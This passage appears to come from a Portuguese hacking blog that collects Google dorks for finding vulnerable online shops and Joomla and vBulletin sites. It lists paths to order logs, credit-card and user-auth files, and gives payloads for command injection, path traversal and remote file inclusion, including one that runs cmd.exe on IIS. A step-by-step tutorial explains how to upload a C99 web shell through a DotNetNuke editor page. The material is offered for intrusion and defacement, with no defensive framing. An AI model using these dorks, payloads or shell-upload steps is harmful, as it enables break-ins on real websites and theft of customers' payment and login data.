    str=
    strona=
    sub=
    tresc=
    url=
    user=


inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"
inurl:"basket.asp?id="
inurl:"Book.asp?bookID="
inurl:"book_list.asp?bookid="
inurl:"book_view.asp?bookid="
inurl:"BookDetails.asp?ID="
inurl:"browse.asp?catid="
inurl:"browse_item_details.asp"
inurl:"Browse_Item_Details.asp?Store_Id="
inurl:"buy.asp?"
inurl:"buy.asp?bookid="
inurl:"bycategory.asp?id="
inurl:"cardinfo.asp?card="
inurl:"cart.asp?action="
inurl:"cart.asp?cart_id="
inurl:"cart.asp?id="
inurl:"cart_additem.asp?id="
inurl:"cart_validate.asp?id="
inurl:"cartadd.asp?id="
inurl:"cat.asp?iCat="
inurl:"catalog.asp"
inurl:"catalog.asp?CatalogID="
inurl:"catalog_item.asp?ID="
inurl:"catalog_main.asp?catid="
inurl:"category.asp"
inurl:"category.asp?catid="
inurl:"category_list.asp?id="
inurl:"categorydisplay.asp?catid="
inurl:"checkout.asp?cartid="
inurl:"checkout.asp?UserID="
inurl:"checkout_confirmed.asp?order_id="
inurl:"checkout1.asp?cartid="
inurl:"comersus_listCategoriesAndProducts.asp?idCategory ="
inurl:"comersus_optEmailToFriendForm.asp?idProduct="
inurl:"comersus_optReviewReadExec.asp?idProduct="
inurl:"comersus_viewItem.asp?idProduct="
inurl:"comments_form.asp?ID="
inurl:"contact.asp?cartId="
inurl:"content.asp?id="
inurl:"customerService.asp?TextID1="
inurl:"default.asp?catID="
inurl:"description.asp?bookid="
inurl:"details.asp?BookID="
inurl:"details.asp?Press_Release_ID="
inurl:"details.asp?Product_ID="
inurl:"details.asp?Service_ID="
inurl:"display_item.asp?id="
inurl:"displayproducts.asp"
inurl:"downloadTrial.asp?intProdID="
inurl:"emailproduct.asp?itemid="
inurl:"emailToFriend.asp?idProduct="
inurl:"events.asp?ID="
inurl:"faq.asp?cartID="
inurl:"faq_list.asp?id="
inurl:"faqs.asp?id="
inurl:"feedback.asp?title="
inurl:"freedownload.asp?bookid="
inurl:"fullDisplay.asp?item="
inurl:"getbook.asp?bookid="
inurl:"GetItems.asp?itemid="
inurl:"giftDetail.asp?id="
inurl:"help.asp?CartId="
inurl:"home.asp?id="
inurl:"index.asp?cart="
inurl:"index.asp?cartID="
inurl:"index.asp?ID="
inurl:"info.asp?ID="
inurl:"item.asp?eid="
inurl:"item.asp?item_id="
inurl:"item.asp?itemid="
inurl:"item.asp?model="
inurl:"item.asp?prodtype="
inurl:"item.asp?shopcd="
inurl:"item_details.asp?catid="
inurl:"item_list.asp?maingroup"
inurl:"item_show.asp?code_no="
inurl:"itemDesc.asp?CartId="
inurl:"itemdetail.asp?item="
inurl:"itemdetails.asp?catalogid="
inurl:"learnmore.asp?cartID="
inurl:"links.asp?catid="
inurl:"list.asp?bookid="
inurl:"List.asp?CatID="
inurl:"listcategoriesandproducts.asp?idCategory="
inurl:"modline.asp?id="
inurl:"myaccount.asp?catid="
inurl:"news.asp?id="
inurl:"order.asp?BookID="
inurl:"order.asp?id="
inurl:"order.asp?item_ID="
inurl:"OrderForm.asp?Cart="
inurl:"page.asp?PartID="
inurl:"payment.asp?CartID="
inurl:"pdetail.asp?item_id="
inurl:"powersearch.asp?CartId="
inurl:"privacy.asp?cartID="
inurl:"prodbycat.asp?intCatalogID="
inurl:"prodetails.asp?prodid="
inurl:"prodlist.asp?catid="
inurl:"product.asp?bookID="
inurl:"product.asp?intProdID="
inurl:"product_info.asp?item_id="
inurl:"productDetails.asp?idProduct="
inurl:"productDisplay.asp"
inurl:"productinfo.asp?item="
inurl:"productlist.asp?ViewType=Category&CategoryID= "
inurl:"productpage.asp"
inurl:"products.asp?ID="
inurl:"products.asp?keyword="
inurl:"products_category.asp?CategoryID="
inurl:"products_detail.asp?CategoryID="
inurl:"productsByCategory.asp?intCatalogID="
inurl:"prodView.asp?idProduct="
inurl:"promo.asp?id="
inurl:"promotion.asp?catid="
inurl:"pview.asp?Item="
inurl:"resellers.asp?idCategory="
inurl:"results.asp?cat="
inurl:"savecart.asp?CartId="
inurl:"search.asp?CartID="
inurl:"searchcat.asp?search_id="
inurl:"Select_Item.asp?id="
inurl:"Services.asp?ID="
inurl:"shippinginfo.asp?CartId="
inurl:"shop.asp?a="
inurl:"shop.asp?action="
inurl:"shop.asp?bookid="
inurl:"shop.asp?cartID="
inurl:"shop_details.asp?prodid="
inurl:"shopaddtocart.asp"
inurl:"shopaddtocart.asp?catalogid="
inurl:"shopbasket.asp?bookid="
inurl:"shopbycategory.asp?catid="
inurl:"shopcart.asp?title="
inurl:"shopcreatorder.asp"
inurl:"shopcurrency.asp?cid="
inurl:"shopdc.asp?bookid="
inurl:"shopdisplaycategories.asp"
inurl:"shopdisplayproduct.asp?catalogid="
inurl:"shopdisplayproducts.asp"
inurl:"shopexd.asp"
inurl:"shopexd.asp?catalogid="
inurl:"shopping_basket.asp?cartID="
inurl:"shopprojectlogin.asp"
inurl:"shopquery.asp?catalogid="
inurl:"shopremoveitem.asp?cartid="
inurl:"shopreviewadd.asp?id="
inurl:"shopreviewlist.asp?id="
inurl:"ShopSearch.asp?CategoryID="
inurl:"shoptellafriend.asp?id="
inurl:"shopthanks.asp"
inurl:"shopwelcome.asp?title="
inurl:"show_item.asp?id="
inurl:"show_item_details.asp?item_id="
inurl:"showbook.asp?bookid="
inurl:"showStore.asp?catID="
inurl:"shprodde.asp?SKU="
inurl:"specials.asp?id="
inurl:"store.asp?id="
inurl:"store_bycat.asp?id="
inurl:"store_listing.asp?id="
inurl:"Store_ViewProducts.asp?Cat="
inurl:"store-details.asp?id="
inurl:"storefront.asp?id="
inurl:"storefronts.asp?title="
inurl:"storeitem.asp?item="
inurl:"StoreRedirect.asp?ID="
inurl:"subcategories.asp?id="
inurl:"tek9.asp?"
inurl:"template.asp?Action=Item&pid="
inurl:"topic.asp?ID="
inurl:"tuangou.asp?bookid="
inurl:"type.asp?iType="
inurl:"updatebasket.asp?bookid="
inurl:"updates.asp?ID="
inurl:"view.asp?cid="
inurl:"view_cart.asp?title="
inurl:"view_detail.asp?ID="
inurl:"viewcart.asp?CartId="
inurl:"viewCart.asp?userID="
inurl:"viewCat_h.asp?idCategory="
inurl:"viewevent.asp?EventID="
inurl:"viewitem.asp?recor="
inurl:"viewPrd.asp?idcategory="
inurl:"ViewProduct.asp?misc="
inurl:"voteList.asp?item_ID="
inurl:"whatsnew.asp?idCategory="
inurl:"WsAncillary.asp?ID="

/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&ac count=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.l og
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_ files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=o rder.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=ord er.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template= order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&templa te=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template= sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=se ll.log
/cgi-bin/shopper.exe?search=action&keywords=order&template= admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=adm in_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=sh opper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt 

terça-feira, 25 de janeiro de 2011

Dorks para scanner de RFI

Remote File Inclusion

Remote File Inclusion (RFI) é um tipo de vulnerabilidade mais freqüentemente encontrados em sites, que permite a um atacante para incluir um arquivo remoto normalmente através de um script no servidor web . The vulnerability occurs due to the use of user supplied input without proper validation. A vulnerabilidade ocorre devido ao uso do produto fornecido a entrada do usuário sem a devida validação. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: Isso pode levar a algo tão mínimo como saída o conteúdo do arquivo, mas dependendo da gravidade, para listar alguns, pode levar a:
Strings de RFI - INJECTION
uma pequena lista dorks 
Quantidade:Aproximadamente 596strings
Autor:Desconhecido
Fonte:goo.gl/5IPJM

domingo, 23 de janeiro de 2011

Vulnerabilidade em base de email

Vulnerabilidade em base de email
Vulnerabilidade em base de email com os termos "Mailbase +br txt" temos acesso a base de mail de vários sites com email brasileiros e internacionais no formato txt
Quantidade:Aproximadamente 1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com

Código:
inurl:mailbase +br ext:txt

String google Acessando arquivo .SQL de sites em joomla

String google Acessando arquivo .SQL de sites em joomla

Com os termos de pesquisa "+joomla +login +user +admin +pass" o google faz uma varredura atrás dos mesmo, tabelas de usuários;administradores;senhas são nosso alvo principal. geralmente as senhas de users são criptografadas com MD5  , Por isso recomendo alguns sites para descriptografia de senhas.
Quantidade:Aproximadamente 1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código:
+joomla  +login|+user|+admin +pass ext:sql

Lista de Dork para Scanner de vulnerabilidade Joomla

Lista de Dork para Scanner de vulnerabilidade Joomla
Joomla! (pronuncia-se djumla) é um Sistema de gestão de conteúdos (Content Management System - CMS) desenvolvido a partir do CMS Mambo. É desenvolvido em PHP e pode ser executado no servidor Web Apache ou IIS e base de dados MySQL.
É um projeto de código aberto (licença GNU/GPL) e a sua última versão estável é a 1.5.21 (em 08 de Outubro de 2010); a sua última versão legada é a 1.0.15. O Joomla! é uma ferramenta de CMS muito poderosa, tendo recebido o "Linux Awards".

Lista de Dork para Scanner de vulnerabilidade Joomla
Quantidade:Aproximadamente 61 strings
Autor:Desconhecido
Fonte:Desconhecido

Scanneando com strings google e Invadindo site

Scanneando com strings google e Invadindo site

Com esse tutorial simples é rápido vamos aprender como fazer upload em sites rapidamente e depois ter acesso

Etapa 01 -
Acesse o www.google.com.br

Etapa 02 -
A busca use o código de pesquisa sabiamente.
Procure pelo seguinte termo
Código:
inurl:/tabid/36/language/en-US/Default.aspx

Etapa 03 -
Com a busca efetuada Aproximadamente 582 resultados (0,25 segundos) escolha um site de sua preferencia,
e substitua o termo "/tabid/36/language/en-US/Default.aspx" por,
Código:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Exemplo:
www.site.com.br/tabid/36/language/en-US/Default.aspx      -01

www.site.com.br/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx -02


Etapa 04 -Você vai ter um link page.So Gallary onde pode criar urls para dentro dos site
Etapa 05 -Não faça nada por enquanto, abordando fase final.
"A caixa e parecida com essa."
PART 01 Scanneando com strings google e Invadindo site


Etapa 06 -
Agora substitua a URL na barra de endereços com um simples script
"delete o endereço do site e cole o código abaixo"
Código:
javascript:__doPostBack('ctlURL$cmdUpload','')

"Depois do script inserido na barra de endereços a caixa fica assim"
PART 02 Scanneando com strings google e Invadindo site



Etapa 07 -
Você vai encontrar a opção de Upload

Etapa 08 -
Selecione Raiz
  
Etapa 09 -
Envie seu pacote de Seu Shell C99, C100 etc..


OBS: todos esse processos foram feitos para que entenda como funciona
podemos ir deireto á fonte também.
Código:
intext:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

ou

Código:
*Fck/fcklinkgallery.aspx 

 ou

Código:
intitle:"Link Gallery" +fcklinkgallery ext:aspx

sábado, 22 de janeiro de 2011

Procurando por vulnerabilidade no sistema de forums Vbulletin

Este resumo não está disponível. Clique aqui para ver a postagem.

Strings para scanner # SQL Injection Dork List #

Strings para scanner Dorck: RFI PHP SQL - Injection

# SQL Injection Dork List #
SQL Injection ou injeção de SQL é uma técnica de invasão de sistemas que se tornou famosa na Internet, mas pode ser utilizada em qualquer linguagem de programação. No entanto, na Internet temos uma combinação explosiva:
  • A aplicação está acessível para toda internet que possui milhares de usuários dispostos a quebrar seu sistema;
  • O uso de linguagens de script fracamente tipadas em conjunto com com tipos de dados fracamente tipados ajuda a abrir algumas brexas de segurança.
  • O protocolo HTTP tem peculiaridades que quando mal utilizadas podem tornar uma aplicação web mais vulnerável como o uso de parâmetros GET.
    Mais conceito
===========================
site:.gov.br +sql +error inurl:"id="
index.php?option=com_mambads
inurl:index.php?option=com_expose
intitle:guestbook  "advanced guestbook 2.2 powered"
filetype:asp inurl:"shopdisplayproducts.asp
"Powered by: vBulletin * 3.0.1"  inurl:newreply.php
"Powered by Invision Power Board(U) v1.3 Final"
inurl:gotoURL.asp?url=
inurl:comersus_message.asp
ext:pl inurl:cgi intitle:"FormMail *"  -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
inurl:"dispatch.php?atknodetype" |  inurl:class.at
"Powered by Gallery v1.4.4"
inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca
inurl:"/becommunity/community/index.php?pageurl="
"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
filetype:cgi inurl:tseekdir.cgi
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle: Index of finance.xls
intitle:index.of passwd passwd.bak
allinurl:loc_id "mod.php?mod=calendar"
allinurl:"mod php mod publisher"artid
allinurl:"mod.php?mod=gallery" id

Uma lista Strins de pesquisa para busca de vulnerabilidades á php injection

Uma lista Strings de pesquisa para busca de vulnerabilidades á php injection

As strings abaixo são direcionadas para scanners RFI - defaces que gostam de um bom scan em ssh rodar aquele velho bot-scanner testar se é safe off! ou safe on! vai gostar das strings á seguir acompanhadas de seus respectivos dorks dando um auxilio para bot encontrar seu site vul.
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
---------------------------------------------------------------
 
Google dork:
inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

------------------------------------------------------------------------------
 
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
------------------------------------------------------------------------------------
 
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-----------------------------------------------------------------------------------
 
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=

-----------------------------------------------------------------------
 
Google dork:
inurl:\"minibb\"
CODE:
components/minibb/index.php?absolute_path=
---------------------------------------------------------------------
 
Google dork:
inurl:\"com_smf\"
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=

-----------------------------------------------------------------------
CODE:
/modules/mod_calendar.php?absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_pollxt\"
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_loudmounth\"
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
------------------------------------------------------------------------
 
Google dork:
inurl:\"com_videodb\"
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_multibanners\"
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht Linkleri görebilmek için ÜYE olmalısınız
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_a6mambohelpdesk\"
Google dork:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
----------------------------------------------------------------------- 
Google dork:
inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
----------------------------------------------------------------------- 
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

-------------------------------------------------------------------- 
Google dork:

inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_mgm\"
CODE:
